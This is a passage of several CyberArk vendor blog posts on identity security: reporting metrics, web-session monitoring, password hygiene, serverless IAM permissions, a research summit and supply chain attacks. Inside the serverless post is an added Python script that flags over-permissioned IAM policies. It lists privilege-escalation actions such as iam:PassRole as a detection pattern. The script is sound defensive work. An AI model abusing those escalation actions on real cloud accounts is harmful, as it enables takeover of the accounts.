Your answers to these questions reveal what your business prioritizes and why. The next step is to dive deeper, defining the milestones and metrics that matter most:

4. Define the milestones or smaller objectives and outcomes related to the workstream, system or process encompassed by the program’s roadmap.

5. Map each milestone directly to the workstream, system or process you’re planning to secure. For instance, if a key program objective is to mitigate the risk of a complete cloud takeover, then you would want to measure things such as number of admin and privileged roles secured by single sign-on (SSO), multi-factor authentication (MFA) and session protection controls, along with the number of accounts and access keys secured by Privileged Access Management (PAM) controls.

Here’s a look at what this approach could look like in action:

Cybersecurity Reporting Framework

The Right Reports for the Right Stakeholders

We’re starting to shift our focus onto the forest now, but there’s still work to do. Every company has stakeholders at various levels within the organization who will need to be briefed. Their role determines the nature of the metrics in your report: those closest to the security team will be interested in the nitty gritty — the individual trees. But the higher up the ladder you go, the broader you must zoom. For example, this cybersecurity veteran uses a one-page “placemat” when reporting to executives. In his words, “If we can’t tell some of the most senior executives within the organization how we’re doing and what the situation is or where they need to help on one page, we don’t deserve to be in this role.”

At most companies, IAM leaders typically report security metrics to four key audiences at regular intervals. Here are some guidelines on how to customize your reports for each level:

Director or vice president of identity (or similar role): With this stakeholder, you’ll typically focus on the individual “trees” — the data for specific metrics and milestones — on a regular basis. Reporting typically occurs monthly, or at least quarterly, and will play a critical role later when it’s time to make board-level reports.

Steering committee: With this group made up of IT and security leaders, project managers and other stakeholders, you’ll cover the same metrics and milestones but will also move up a level to discuss goals and report on blockers or issues related to your security initiatives. These meetings typically happen once or twice each quarter.

Strategic business review by IAM stakeholders: Now you’ll be briefing IAM leaders, lead engineers and key stakeholders, as well as security vendors and partners. In addition to giving reports to the steering committee, you’ll describe how to push forward to help reach the company’s desired business goals and outcomes. These briefings are typically held quarterly or semi-annually.

C-level executives and the Board: This is when the whole forest comes into full focus, and the reports for your director or vice president become part of a presentation given by the CISO or CIO. The board will want to know the overall state of security affairs and how the work you’ve done to achieve your goals impacts the business — as well as what the return on their security investment has been. Board meetings are usually annual or semi-annual affairs.

Notice how in this progression you’ll move gradually from discussing trees in the beginning to presenting the forest in the end. The reporting framework you develop returns its dividends in the form of informed stakeholders and supportive leadership.

Now You’re Flying Above the Treetops

Gaining perspective on the entire forest means realizing it’s more than just the trees. That knowledge enables more transparent, effective reporting and communication across all lines and levels of business.

So where can you go from here?

  • Don’t let the scope of this undertaking daunt you. Yes, the forest is big, but a conscious shift in perspective goes a long way in refocusing efforts.
  • If you aren’t already doing so, start developing your own reporting processes, set review cadences and drive your programs forward with the data you collect from these.
  • Dig into the CyberArk Blueprint for Identity Security Success to help guide your roadmap and set major goals and milestones.
  • Check out the eBook Securing Success: Reporting PAM Wins, which discusses how to define a PAM risk mitigation strategy, designing effective frameworks, and executing your reporting strategy.
Unmask Insider Threats and Errors – Regain Security Control https://www.cyberark.com/blog/unmask-insider-threats-and-errors-and-regain-security-control-with-cyberark-identity-secure-web-sessions/ Tue, 02 Nov 2021 13:19:58 +0000 https://www.cyberark.com/?p=124408

Employees across finance, sales, HR, marketing and virtually every other business department need access to web applications to do their jobs. In fact, new CyberArk research found that in a majority of organizations (70%), a typical business user has access to more than 10 business applications, many of which contain high-value data such as financial records, customer information and intellectual property.

So what happens when an insider uses this legitimate access to obtain confidential data or change something they shouldn’t? Eighty percent of organizations have been in this position — forcing security teams to race against the clock to find out what happened.

In most cases, insider misuse or abuse of application access is unintentional. But making a fast, informed determination between an honest mistake and risky behavior is easier said than done. Investigating user activity takes a trifecta of time, resources and tools — things security and compliance teams don’t always have. And since built-in security controls vary wildly between applications, security teams struggle to consistently enforce strong controls across hybrid IT environments.

[Image: SWS Web Application Statistics]

CyberArk Identity Secure Web Sessions, the newest addition to our Software-as-a-Service (SaaS) portfolio, helps security and compliance teams unmask and address insider threats and errors quickly by adding extra layers of security to web application sessions. Here’s a look at three real-world industry examples of Secure Web Sessions in action.

Protecting business-critical applications from insider errors and abuse at a high-growth tech firm

Like many organizations, tech companies often struggle to maintain visibility across their fast-growing, highly distributed employee bases. This makes it difficult to understand which end-users are accessing business-critical web applications, when they’re accessing them, and for what purposes.

For example, if someone in the finance department with elevated access rights made a mistake when using a payroll system that led to unauthorized payroll changes, the team would have to sift through thousands of lines of logs and recreate every step the user took to understand what happened.

With CyberArk Identity Secure Web Sessions, these teams could see exactly what happened in that web session and easily trace unauthorized configuration changes within a protected app down to a click. It also makes it easy to search any recorded session for specific keywords or actions to further focus and accelerate the investigation.

Safeguarding sensitive financial data on the trading floor with continuous authentication 

Stock traders use multiple devices and applications on trading room floors to save time and gain deeper insights into pricing fluctuations, market data and other critical information. They’re also constantly moving around – not often tied to a desk. It’s easy to imagine a scenario in which a trader steps away from a device during an in-progress web session, inadvertently exposing sensitive information to data loss, fraud or abuse.

In this scenario, CyberArk Identity Secure Web Sessions could help to protect sensitive financial data from unauthorized access by monitoring the trader’s web application usage. If and when they walk away from an open highly-sensitive session, Secure Web Sessions will automatically log them out and prompt re-authentication. Meanwhile session recording and attribution help drive greater accountability.

Continuously verifying that the person who initiated the web session is the same one using the application is an authentication challenge shared by organizations across industries. Nearly 41% of all organizations said that better visibility into user activity would enable them to identify the source of a security incident more quickly, while 38% said it would help them provide more comprehensive reporting to auditors.

Securing patient medical records by restricting data copying and downloading

Doctors and nurses regularly update various patient records throughout the day, while connecting with a host of other IoT devices that record data from heart rates to prescription dosages. Ransomware operators and other malicious actors are zeroing in on these devices, hoping to infiltrate them and progress their attacks toward target systems and sensitive PII.

According to our research, 43% of healthcare providers lack the ability to monitor and audit most of their business apps that contain high-value data. With CyberArk Identity Secure Web Sessions, healthcare organizations and hospitals can further protect their applications, patient data and users with application-specific session protection. Secure Web Sessions adds local hardening layers to the sensitive web session, protecting it from dangerous actions such as copying and downloading data. Optional integration with CyberArk Endpoint Privilege Manager helps to prevent access from malicious processes, even those already running on the user’s endpoint device. Doctors and nurses can continue to safely access protected applications, while admins can be confident that the session and the patient data behind it are secured.

Previously, the only way to achieve a similar protection was to configure each application to use streamed browser sessions, a process difficult to scale that often results in dangerous latency issues. Since all protections and recordings run transparently in the background, healthcare providers can enjoy a secure, frictionless user experience and stay focused on what matters most: delivering the highest level of patient care.

Secure High-Risk User Activity with CyberArk Identity Secure Web Sessions

Secure Web Sessions is an add-on capability to CyberArk Identity Single Sign-On and serves as an authentication factor for accessing protected web applications. Request a free 30-day trial and discover the many benefits of simplified, context-aware session recording, auditing and protection for the applications powering your business.

To dig into more details and features, read today’s press release or browse the solution brief.

What Squid Game Reminds Us About Cybersecurity https://www.cyberark.com/blog/what-squid-game-reminds-us-about-cybersecurity/ Thu, 28 Oct 2021 13:55:37 +0000 https://www.cyberark.com/?p=124296 What Squid Game Reminds Us About Cybersecurity

This Halloween, you’re likely to see a lot of green tracksuits, thanks to the pop culture juggernaut that is Netflix’s Squid Game. In case you’re still, somehow, in the dark, the South Korean television series is like a mix of Hunger Games and The Running Man, as it follows a desperate group of people lured into playing deadly versions of children’s games like “Red Light, Green Light” and “Tug-of-War” for a slowly increasing pot of money that swells into the billions.

For those in the cybersecurity community, seeing the concept of “survival of the fittest” put through the wringer in such brutal ways strikes a particularly familiar chord (the show itself has even had its own data exposure problems). The climactic (and titular) “squid game” involves one person, the “defender,” trying to prevent another, the “attacker,” from passing through a narrow entry point before they can reach their end goal. Could there be a cybersecurity metaphor more on the nose?

So, in honor of one of the bloodiest, most intense shows you’ll likely watch this Halloween season (take note Michael), here are some cybersecurity takeaways from Squid Game and its varied games. (Spoiler alert: If you haven’t seen the show, you may not want to read past this line until you do.)

“Red Light, Green Light” and the Importance of Permission and Privilege

It’s a schoolyard classic — one player stands with their back to the others and says, “green light,” prompting players to traverse as much ground toward a designated finish line as possible. Upon hearing the “red light” cue, everyone must freeze. The show takes this innocent game to a deadly level, as a (super creepy) robot doll scans players for even the slightest hint of movement, then sets off computer-guided guns to eliminate the disqualified — for good.

Today’s organizations can assume that at least one “player” in their network is inching forward without permission. By enforcing “red lights” and continuously validating the need for individual identities to have access to data and resources, security teams are in a better position to stop attackers from escalating privileges and reaching the finish line to accomplish their goal.

“Dalgona” and Working Smarter Not Harder Against Cyber Threats

In one of Squid Game’s most intense sequences, participants are given dalgona, a common Korean street treat (also known as Ppopgi, which is basically a very brittle candy made of brown sugar and baking soda). Street vendors will impress simple shapes into them, like stars or circles, and ask children to break out the shape without cracking it, which is very difficult to do. In the show, some characters are given triangles, while others are stuck with more complicated shapes, such as umbrellas.

Just like dalgona, cybersecurity systems should be built to slow attackers down: throw in some jagged edges or looped curves like an umbrella handle — anything to add layers of difficulty that inhibit an attacker’s progress and raise red flags faster. These systems should also incorporate ways to automate and simplify security processes. Squid Game’s protagonist Seong Gi-Hun offers a valuable strategy here. By licking the back of the honeycomb candy, he can melt the shape out rather than try to crack it — much like how threat detection and analytics capabilities can speed the process of finding and blocking threat actors to limit, or even prevent, damage.

“Tug Of War” and the Need for Security-Productivity Balance

We’ve all likely played this one. Teams on either end of a long rope try to pull one another over a designated “out of bounds” area. This game of “survival of the fittest” closely mirrors the constantly back-and-forth struggle between attackers and defenders.

Security teams face their own constant tug of war between two directly opposing, yet equally important, needs: one side pulling for stronger security measures to protect the business, the other pulling to speed rollouts and boost user productivity. The only way to win is to act intelligently, not aggressively. “Wins” can be achieved on both sides if Zero Trust measures are adopted across the entire “game” or cycle of accessing critical assets. That’s where Identity Security solutions come in. For instance, contextual authentication methods can help verify every user is who they claim to be — without making users jump through lots of hoops. And by granting proper permissions the second they’re needed (and taking them away the second they’re not), organizations can more intelligently implement least privilege controls, finally ending the back-and-forth stalemate between security and productivity.

“Marbles” and the Power of (Zero) Trust

In one of the most open-ended games in the series, participants are divided into teams of two. Each is given a bag of 10 marbles and instructed to obtain all their partner’s marbles by any non-violent means. One of the characters, Cho Sang-woo, devises a scheme for him and his partner to both win and his partner trusts him. Bad call, of course: Cho Sang-woo wins by deceit.

Although the least structured of the games in the series, it may be the most direct. This is Zero Trust in human form, a true insider threat. Even if someone appears to be trustworthy, you shouldn’t hand them all of your marbles (let alone one) until they are properly vetted and verified.

“Glass Bridge” and Learning from Early Adoption

Straying from the idea of simple children’s games, the fifth challenge in Squid Game involves a long glass bridge the remaining participants must cross. The challenge is that some of the panels are tempered glass that will hold a person’s weight, while others are ordinary glass that will shatter instantly and send them tumbling to their deaths.

The impetus to innovate and find new ways to combat threats — in essence, to be the first one to barrel along the glass bridge — can be rewarding, but it can also be treacherous. Getting ahead of advanced threats is the goal but realizing that it can sometimes take time to suss out the needs of your business or organization is also important. Plus, sometimes it takes learning from an attack to properly illuminate the right path forward.

“Squid Game” and Assume Breach

As we mentioned earlier, the titular squid game is something actually played on South Korean playgrounds. Children draw a large diagram in the dirt or sand, resembling a house with a simple square base and a triangular “roof,” separated by a wall with an opening in the middle. Two circles are then drawn on the ends of the diagram. The goal is simple: one team of defenders must keep a team of attackers from getting through the small opening and into their circle at the top of the triangle by any means necessary.

In the digital world, distinct “lines” delineating corporate networks no longer exist. Instead of trying to guard a constantly morphing perimeter, cybersecurity teams are turning inward to protect what matters most. This is when the concept of “assume breach” comes into play (and actually does on the show as well). Defender Cho Sang-woo assumes attacker Seong Gi-Hun will get through the opening and opts to protect the prized circle at all costs, instead of trying to keep him out of bounds.

Although brutal, Squid Game is ultimately (and arguably) a fun exercise in “what would I do in this situation?” for most viewers — with extra resonance for those making a living protecting shifting landscapes, navigating invisible walls and pathways, and snuffing out untrustworthy visitors in the digital world. The wearing of green tracksuits is optional, of course (but be careful with those dalgona in your candy bucket).

Make Cybersecurity a Priority with Tips from Work and Personal Life https://www.cyberark.com/blog/make-cybersecurity-a-priority-with-tips-from-work-and-personal-life/ Tue, 26 Oct 2021 13:00:15 +0000 https://www.cyberark.com/?p=124256 Make Cybersecurity a Priority with Tips from Work and Personal Life

Employees have been chasing the fabled “work-life balance” for an eternity (or at least as long as there have been LinkedIn “influencers”). But the undeniable truth is that the ‘choice’ to pursue balance was taken away. The time of the pandemic has erased boundaries to the point that, for many of us, “working” and “living” are essentially one and the same.

It’s not all bad, of course. Remote and hybrid work has given office workers more flexibility than they ever thought possible. But it also means careless cybersecurity practices have the potential for broader and more damaging ripple effects.

This final week of Cybersecurity Awareness Month is all about making security an ongoing priority. For individuals today, that means keeping cybersecurity at the forefront of your mind, and borrowing best practices from both work and personal life as you connect daily. And focusing on password health is a great place to start.

“I don’t know about you, but I don’t have any more passwords left in me.”

Yeah, we hear you. Passwords are annoying. But for now, they’re an inevitable part of digital life (though some companies are starting to re-think passwords completely). And today, there’s a chance your own risky password habits have found their way into your workplace and may be putting your company’s data in jeopardy.

Since the pandemic’s arrival, the average consumer has created 15 new online accounts, according to a 2021 IBM survey. It makes sense: we’ve been stuck at home, relying on digital distractions like binging on shows, shopping online and scrolling on social media to pass the time. In juggling so many new and existing online accounts, 82% of people “gave up,” so to speak, and admit to reusing their passwords and credentials at least some of the time, the same IBM survey found.

All the while, workers need to access their company’s network — often from home offices and on personal devices — to do their jobs. A May 2021 HP report found that more than 70% of surveyed employees claim to have access to more company data more frequently than they did before the pandemic. And in too many cases, they’re re-using passwords from other personal accounts to unlock access to customer data, financial records and HR files. What’s more, they’re increasingly using their work devices for personal tasks and even sharing passwords for things like streaming services with friends and family.

It’s a vicious cycle, and attackers are taking full advantage: people are sick of creating and remembering new passwords, so they create ones that are (too) easy to remember, reuse them in multiple places and even share them freely. Bad actors easily crack and compromise these passwords and use them to propagate further attacks — both on other consumers and the companies they work for.

“Someone cracked my password. Now I need to rename my dog.”

Drawing on cybersecurity best practices for both consumers and corporations, here are seven simple steps for boosting online safety:

1. Do a full password reset. Block some time and reset all your personal online passwords. Follow this helpful U.S. Cybersecurity and Infrastructure Security Agency (CISA) guidance on things like password length and complexity.

2. Don’t reduce, reuse and recycle. Your passwords, that is. If you’re using the same password across all personal and work accounts, you are essentially opening the door to attackers who can waltz in and gain access to everything.

3. Protect your passwords. It’s a bad habit to store passwords in your browsers. Password managers are not foolproof, but they’re a better option for personal use. An even stronger way to protect a password is to validate it with something unique to you — like your phone or your fingerprint. Enable multi-factor authentication (MFA), utilizing push notifications or biometrics for any service that requires logging in, such as email, banking or social media.

4. Focus on prevention: Never click on suspicious links or open strange attachments and only download software from trusted sources. Phishing and social engineering attacks are still among the most common origins of password theft and data breaches.

5. Browse with caution. Anytime you browse the web at home, log in and run as a “guest” or other non-administrator account (you’ll see this option when you first turn on your computer and see a list of user profiles). This gives you just enough access to do what you need to do while reducing exposure if something you open turns out to be malicious.

6. Set up account monitoring. It’s also a good idea to set up alerts on your personal accounts to help you recognize and respond to suspicious activity, like fraudulent bank charges, before they become big problems.

7. Pay attention to your devices. Always change default passwords and usernames for home routers and internet-connected devices (thermostats, refrigerators, baby monitors and more) to make them more secure. CISA provides some great tips on ways to protect your digital home and boost your wireless security.

These baseline steps of changing passwords, limiting access, layering login security and monitoring activity are fundamentally the same, whether you’re an individual or a company working to #BeCyberSmart. Cybersecurity can’t be an afterthought, and you can apologize to the Netflix freeloaders in your life later. It simply has to come first.

Why Tackling Serverless IAM Threats Takes a Team https://www.cyberark.com/blog/why-tackling-serverless-iam-threats-takes-a-team/ Thu, 21 Oct 2021 15:00:15 +0000 https://www.cyberark.com/?p=124001 Why Tackling Serverless IAM Threats Takes a Team

Cloud-native serverless architecture — sometimes known as function as a service, or FaaS — promises to take application development to new heights. Without the burden of managing infrastructure internally, developers can focus their creativity and efforts on writing and deploying code in the cloud without the headaches of running it.

From finance to education, organizations of all types are realizing the benefits of serverless as they mature their multi-hybrid cloud strategies. In fact, McKinsey recently positioned serverless alongside software as a service (SaaS) and open source software as the “technology trifecta” that can “rapidly accelerate business building for established companies that learn how to use them.” The McKinsey researchers shared compelling examples of serverless development in action, from an oil and gas company that spun out a series of products in just 12 weeks using a consistent serverless architecture to a major private equity firm that developed an innovative new investor site using serverless.

Despite the benefits of reduced costs and increased speed, flexibility and accuracy, a long-time security challenge has crept into this shiny new serverless realm: Organizations must effectively manage Identity and Access Management (IAM) permissions across CI/CD pipelines and development teams, while giving everyone (and everything) the access they need to deliver innovation at scale.

Out of perceived necessity, many security architects take a “more is more” approach, granting more permissions than they need. As a result, the risk of accidental exposure is extremely high in these dynamic environments, resulting in too many IAM permissions left in code and deployed into production. Some security architects do try to review code for serverless functions to identify excessive permissions and enforce least privilege on their own. But this takes significant time and resources that can often lead to costly time-to-market delays.
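The review the paragraph above describes, identifying excessive permissions in the policies that serverless functions carry into production, can be automated at the policy-document level. The following is an added example, not CyberArk code and not a CyberArk Labs tool: it parses IAM policy documents in the AWS JSON policy format and flags the three patterns that most often turn a function role into an attack shortcut, wildcard actions, wildcard resources and a small set of identity actions that allow privilege escalation. Both policies are constructed samples (the bucket, table and account ID are placeholders), and the escalation-action list is an illustrative assumption rather than an exhaustive one. The check deliberately ignores `NotAction`, `NotResource` and `Condition` blocks, so treat a clean result as "nothing obvious," not as proof of least privilege.

```python
"""
Flag over-permissioned IAM policy documents attached to serverless functions.

Added example, not CyberArk code. The policies below are constructed samples
in the AWS IAM policy JSON format; a real policy would come from the
function's SAM / Serverless Framework template or `aws iam get-role-policy`.
"""
import json
from typing import Any, Dict, List

# Constructed sample: what a "more is more" function role tends to look like.
OVER_PERMISSIVE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["dynamodb:*", "iam:PassRole"], "Resource": "*"},
    ],
})

# Constructed sample: the same function scoped to the two things it actually does
# (read one bucket prefix, read/write one table). ARNs are placeholders.
LEAST_PRIVILEGE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-invoices/*"},
        {"Effect": "Allow", "Action": ["dynamodb:PutItem", "dynamodb:GetItem"],
         "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/Invoices"},
    ],
})

# Assumption: a short, illustrative list of actions that let a function acquire
# permissions beyond its own role when granted on a wildcard resource.
ESCALATION_ACTIONS = {
    "iam:PassRole", "iam:CreatePolicyVersion", "iam:AttachRolePolicy",
    "iam:PutRolePolicy", "sts:AssumeRole",
}


def _as_list(value: Any) -> List[Any]:
    """IAM allows a single string or a list for Action/Resource; normalize."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def find_excessive_permissions(policy_json: str) -> List[Dict[str, Any]]:
    """Return one finding per risky pattern in each Allow statement.

    Only Effect=Allow statements are inspected. NotAction, NotResource and
    Condition are ignored, so this is a first-pass triage, not a full evaluator.
    """
    policy = json.loads(policy_json)
    findings: List[Dict[str, Any]] = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [str(a) for a in _as_list(stmt.get("Action"))]
        resources = [str(r) for r in _as_list(stmt.get("Resource"))]
        for action in actions:
            if action == "*" or action.endswith(":*"):
                findings.append({"statement": idx, "action": action,
                                 "reason": "wildcard action"})
            elif action in ESCALATION_ACTIONS:
                findings.append({"statement": idx, "action": action,
                                 "reason": "privilege-escalation action"})
        if any(r == "*" for r in resources):
            findings.append({"statement": idx, "action": ",".join(actions),
                             "reason": "wildcard resource"})
    return findings


def is_least_privilege(policy_json: str) -> bool:
    """True when the triage check finds nothing to report."""
    return not find_excessive_permissions(policy_json)


if __name__ == "__main__":
    for name, doc in (("over-permissive", OVER_PERMISSIVE_POLICY),
                      ("least-privilege", LEAST_PRIVILEGE_POLICY)):
        print(f"== {name} ==")
        for f in find_excessive_permissions(doc):
            print(f"  statement {f['statement']}: {f['reason']} ({f['action']})")
        print("  clean" if is_least_privilege(doc) else "  needs review")
```

Run it over every inline policy in a repository before the pipeline deploys, and fail the build on any finding; the scoped policy passes while the wildcard one produces five separate findings, which is the kind of signal a reviewer would otherwise have to dig out of the template by hand.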

In most cases, serverless architecture is far from the only managed cloud deployment security architects must deal with. And as their security responsibilities grow to span infrastructure and multiple interconnected cloud platforms, so does the challenge of consistently enforcing IAM controls. Meanwhile, since the cloud comes without a perimeter, attackers recognize that compromising an over-permissioned account or role in the cloud can simplify the attack path and help them reach their goals faster. Not surprisingly, software supply chain attacks keep coming and growing in scale and sophistication.

In ongoing conversations with cloud security teams and architects at global organizations, we’re hearing the same serverless security challenges echoed repeatedly:

  • “Our cloud environment is already so complex that it’s difficult to even see where over-permissioned risks exist in serverless applications — let alone do anything about them.”
  • “I can’t detect or remediate these excessive permissions without investing enormous effort.”
  • “Without the right IAM policy recommendations in place, our developers can’t use serverless applications and cloud functions to their full advantage.”

If serverless functions are to become the foundation of future application development processes — as many digital enterprises believe will be the case — the fundamental cybersecurity practice of least privilege enforcement must encompass this foundation and extend to all IT environments without disrupting security or development team productivity.

In the words of Henry Ford, “If everyone is moving forward together, then success takes care of itself.”  Our team at CyberArk Innovation Labs is exploring these challenges as we broaden our capabilities for securing cloud workloads from identity-based attacks. As we continue to innovate and advocate for secure-by-design cloud principles, we’re seeking design partner organizations to test new capabilities for securing permissions used by serverless functions.

If you’re interested in learning more, start investigating excessive permissions in your cloud environments and reach out to hexagon@cyberark.com.

INTENT Security Research Summit: Explore. Experience. Share. https://www.cyberark.com/blog/intent-security-research-summit-explore-experience-share/ Tue, 19 Oct 2021 13:00:31 +0000 https://www.cyberark.com/?p=123971 INTENT: The Security Research Summit

While enterprises fight to stave off relentless attacks, 57% of them are hamstrung by the ever-worsening global cybersecurity skills shortage. An estimated 4.07 million industry positions remain unfilled at a time when the world needs skilled defenders the most.

Week three of Cybersecurity Awareness Month is dedicated to addressing this pervasive challenge through the exploration of cybersecurity careers. Led by the National Initiative for Cybersecurity Education (NICE), this “Explore. Experience. Share” initiative aims to energize and promote a robust ecosystem of cybersecurity education, training and workforce development.

We spoke with Lavi Lazarovitz, head of CyberArk Labs, and Andy Thompson, CyberArk technical evangelist, about their own cybersecurity careers and how collaboration is key to both personal career fulfillment and overall industry advancement. They also gave us the scoop on INTENT — a virtual research summit for cybersecurity researchers, by researchers, happening November 16, 2021. Founded by CyberArk and Checkmarx and partner organizations Claroty, F5, Imperva, Intezer and SentinelOne, it’s a one-of-a-kind event you won’t want to miss. Here’s what they had to say:

Blog Team: Whether it’s students, veterans or those seeking a career change, cybersecurity is rapidly evolving and has something for everyone. Do you remember what specifically sparked your interest in a cyber career path?

Lavi: “One of the things that pushed my curiosity and ultimately led me to the field of cybersecurity research, is the fact that it’s so accessible — you can see and experience everything firsthand. For example, when a big vulnerability is discovered on a user application or popular protocol (like Heartbleed that shook the world in 2014), you can dig into the research others have done, and do your own testing and discover how to adopt a process, such as fuzzing, to find new bugs and security loopholes. When you’re experiencing a vulnerability for yourself, it’s easy to imagine the impact it could have on the services and applications people use on a daily basis — along with the role you can play in mitigating risk and making the digital world a safer place.”

Blog Team: Can you highlight some of the intrinsic characteristics and personality traits that make a great cybersecurity researcher?

Lavi: “Cybersecurity research is all about trying stuff — having that ‘hacker’ mindset of breaking and re-constructing things in new, unique ways. There isn’t always a right way to do it; instead, it’s about being curious and creative and exploring why and how things work. Along with strong technical skills, cybersecurity researchers are typically highly driven individuals who thrive on learning from one another and often have a bit of a competitive streak.”

Blog Team: Can you describe how the CyberArk Labs team approaches their cybersecurity research projects — and how it’s helping drive greater industry awareness around emerging threats?

Lavi: “The research team is the foundation of CyberArk Labs. What started out as four researchers has grown into an elite team of dozens of white-hat hackers, intelligence experts and world-renowned cybersecurity practitioners, many of whom served in the Israel Defense Forces. Working side by side, they examine emerging attack techniques and post-exploit methods to understand the attack chain and how attackers operate. Their work puts us in a strong position to not only ensure CyberArk customers are more secure, but also to benefit the entire cybersecurity community. We believe security is a team game; it’s all about collaboration. That’s what you see within CyberArk Labs and that’s why we’re putting on the security research summit, INTENT, on November 16.”

Blog Team: Tell us more about INTENT and why cybersecurity practitioners and researchers should plan to attend next month.

Andy: “We’re excited about the format of this virtual event, being led out of Israel, where attendees will learn from acclaimed security researchers from around the world, such as Benjamin Delpy (aka gentilkiwi, the developer behind Mimikatz).”

“Beyond exploring findings of some major new research projects, we’re pulling the curtain back to reveal the process itself: how to deconstruct the attack cycle and adopt an attacker’s mindset to discover critical security holes that can be exploited. And we’re giving it to you straight: sometimes things don’t go as planned. We’ll show what happens when security research goes wrong and what you can learn from it.”

Blog Team: We understand the INTENT team has been hard at work reviewing speaking submissions and finalizing the agenda. Could you give us a sneak peek at some sessions you’re particularly excited about?

Andy: “We’ve got a jam-packed agenda — it’s hard to choose favorites — but here are three sessions that attendees won’t want to miss:

  • An elite hardware white-hat hacker’s real-world account of reverse-engineering a major city’s smart meter system to determine electrical uptimes during the worst winter storm in decades and to help keep citizens safe;
  • How a security research group teamed up to uncover vulnerabilities in one of the world’s top collaboration software tools — and landed a major prize in the process; and
  • A deep dive into VSCode extension vulnerabilities and their far-reaching implications.”

Blog Team: INTENT is a great example of the industry’s push for deeper collaboration and information sharing — what many believe are keys to improving the overall security posture of organizations and governments everywhere. Why is this so important?

Lavi: “As security researchers, we’re focused on unearthing vulnerabilities everywhere. We regularly share our research findings with other industry organizations, along with government and law enforcement agencies that can use our findings to deepen real-world vulnerability investigations. For instance, CyberArk is part of the Institute for Security and Technology (IST) Ransomware Task Force — a coalition of public and private sector organizations that have joined forces to provide clear recommendations on ransomware mitigation. We all bring unique experiences and perspectives to the table and are united by a common mission to make systems safer.”

Blog Team: In closing, what would you say to those considering a career in cybersecurity research today?   

Andy: “Whether you’re on the offensive or defensive side, you’re on the good team, fighting the good fight. The work you do every day truly matters — and it makes our society, and our world, a better place.”

Have a passion for collaborative problem-solving and hands-on security research? Register for INTENT today to save your spot. And if you’re considering a career in cybersecurity or looking for advancement opportunities this Cybersecurity Awareness Month, check out CISA’s Cyber Career Pathways Tool, aligned to the NICE Cybersecurity Workforce Framework, and our own CyberArk training and certification offerings to get started.

Software Supply Chain Attacks: Who Owns the Risk and What Can Be Done? https://www.cyberark.com/blog/software-supply-chain-attacks-who-owns-the-risk-and-what-can-be-done/ Fri, 15 Oct 2021 12:00:46 +0000

Editor’s Note: This post was co-authored by John Walsh, senior product marketing manager, DevOps security, CyberArk, and Tim Johnson, director, product marketing, CloudBees, and the original version was published on CloudBees.com. The post has been updated to include recent industry guidance.

By the time you hear about a software supply chain attack, it will have already become a massive problem and public relations nightmare. However, these attacks don’t start out that way. In fact, they almost always begin with a tiny gap, like an exposed Git credential or a misconfigured CI/CD tool, earlier in the supply chain. And that’s exactly what cyber adversaries are looking for.

Attackers infected more than 18,000 conscientious SolarWinds customers by injecting malicious code into an otherwise legitimate software update. The April 2021 Codecov breach was traced back to a process error that enabled the bad actors to extract credentials and modify scripts. In the massive Kaseya ransomware attack, trusted software was compromised to reach into the company’s global customer base. And things are only expected to get worse. According to Gartner®, “By 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021.”[1]

These recent headline-grabbing attacks have resulted in significant financial and reputational damage and prompted many organizations to re-examine their own development environments and delivery practices to identify vulnerabilities. And they’re getting to the heart of the issue: unprotected secrets (credentials, SQL/LDAP passwords, SSH keys and API tokens) that provide privileged access to the organization’s most valuable data and resources. A single, unprotected access point is all it takes for an attack to rip through an entire IT environment and move downstream to customers and partners.

The “Secret” to Software Delivery Automation 

Jenkins — plus all the other tools, platforms and containers used by developers to automate software delivery — must be able to interact with numerous systems and applications throughout the DevOps environment to accomplish its role as the “butler.” To do this, it requires access to the powerful secrets used to reach source control and to deploy artifacts.

If not configured properly and secured, these secrets become easy — and valuable — targets for attackers. CI/CD pipelines and other DevOps tools are “Tier Zero” assets: access them and you get access to more privileged credentials. Using compromised privileged credentials, attackers can take confidential data, inject malware into the codebase, make significant changes to an application’s functionality or steal code and valuable IP from repositories.

Gartner® has issued the following guidance: “We recommend privileged access management (PAM) tools to monitor and protect privileged service accounts that run builds and automation jobs. In the SolarWinds attack, attackers modified trusted domains and abused privileged roles. We see that as a confirmation that privileged accounts are a primary target. Mitigating this risk often requires privileged accounts to be managed by a PAM.”[2]

It’s clear that protecting the privileged access embodied in secrets and credentials across the DevOps pipeline is key to protecting software integrity and securing the supply chain. But who ultimately bears this responsibility?

Who Actually Owns Software Supply Chain Risk? 

The shift to modern infrastructure and DevOps has created complexity and differences in how security needs are met. Regulations and industry standards such as Sarbanes-Oxley (SOX) require organizations to take ownership of supply chain risk, implement specific DevOps security controls and provide greater transparency to minimize risk. Meanwhile, customer demands for security assurance, coupled with modern digital experiences, are increasing rapidly.

Security teams are charged with securing digital value chains that protect customer data, starting with who, or what, is allowed to access what within the CI/CD pipeline and production environments, when and for how long. The challenge is finding a way to achieve that goal without slowing down developers.

Developers face their own security dilemma: with a laser focus on bringing innovations to market fast, the DevOps culture emphasizes high velocity, intensive sharing of code, ad-hoc tooling and full-on automation. In this culture, low-security shortcuts often flourish, such as putting unprotected secrets in Jenkinsfiles to save time or reusing open-source code from the internet without sufficient scrutiny. The last thing developers want is someone else preventing them from getting their work done, and they don’t really want to have to “own” security, yet they also do not want to be held responsible for a costly breach-related outage.

As a result, some types of DevOps security, vulnerability and code scanning are being integrated into DevOps processes. Yet in many organizations, secrets management remains a basic functionality that’s fragmented across individual DevOps tools, making them difficult for developers (who don’t have time to become security experts) to manage and secure. When security issues are discovered — sometimes right before code is scheduled to go into production — developers feel the pain in terms of last-minute code changes and delayed releases.

The evolving development landscape requires security and development to work together to secure secrets across the CI/CD environment to reduce risk and minimize damage from the next supply chain threat. A centralized approach to secrets management makes it easier for developers to maintain their existing workflows and keep moving fast.  

Follow These Three Steps to Protect the Pipeline 

